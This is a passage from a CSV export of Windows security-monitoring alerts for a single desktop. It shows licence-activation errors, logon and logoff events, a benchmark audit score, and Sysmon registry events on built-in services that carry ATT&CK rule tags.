10:25:55.422",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable""" +"Apr 24, 2020 @ 10:25:52.548",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 10:25:52.283",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x864E9 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 10:25:52.253",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x86508 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 10:25:52.213",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x86508 + Linked Logon ID: 0x864E9 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:25:52.189",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x864E9 + Linked Logon ID: 0x86508 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:25:47.284",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 10:25:44.264",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 10:25:44.181",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:25:44.149",3,"The database engine attached a database",,"""SearchIndexer (4468,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00DB:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000008 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.080503 -0.080241 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.096983 -0.066686 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:42, WS:124K # 0K, PF:148K # 0K, P:148K) +[4] 0.000100 +J(0) +[5] - +[6] - +[7] - +[8] 0.016881 -0.000653 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:52, WS:208K # 0K, PF:660K # 0K, P:660K) +[9] 0.086385 -0.000192 (5) CM -0.085901 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 132K, P:256K) +[10] 0.000319 -0.000195 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 8K, PF:96K # 96K, P:96K) +[11] 0.000017 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000052 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.000001 +J(0) +[14] 0.000001 +J(0) +[15] 0.000008 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 10:25:44.058",3,"The database engine is starting a new instance",,"""SearchIndexer (4468,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 10:25:42.236",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 10:25:40.879",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.473847400Z"",""eventRecordID"":""545"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:35.414\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:35.414"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:35.414 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.712",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.021631700Z"",""eventRecordID"":""539"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.686",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.021301500Z"",""eventRecordID"":""538"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3ea3f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3ea3f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3ea3f\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 10:25:40.642",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.019949100Z"",""eventRecordID"":""537"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.637",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.019560900Z"",""eventRecordID"":""536"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.583",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.017993100Z"",""eventRecordID"":""535"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3ea3f\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.565",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.017212000Z"",""eventRecordID"":""534"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.540",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.013087000Z"",""eventRecordID"":""533"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 10:25:40.506",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.012466500Z"",""eventRecordID"":""532"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.409",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.011150200Z"",""eventRecordID"":""531"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.398",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.010762700Z"",""eventRecordID"":""530"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: 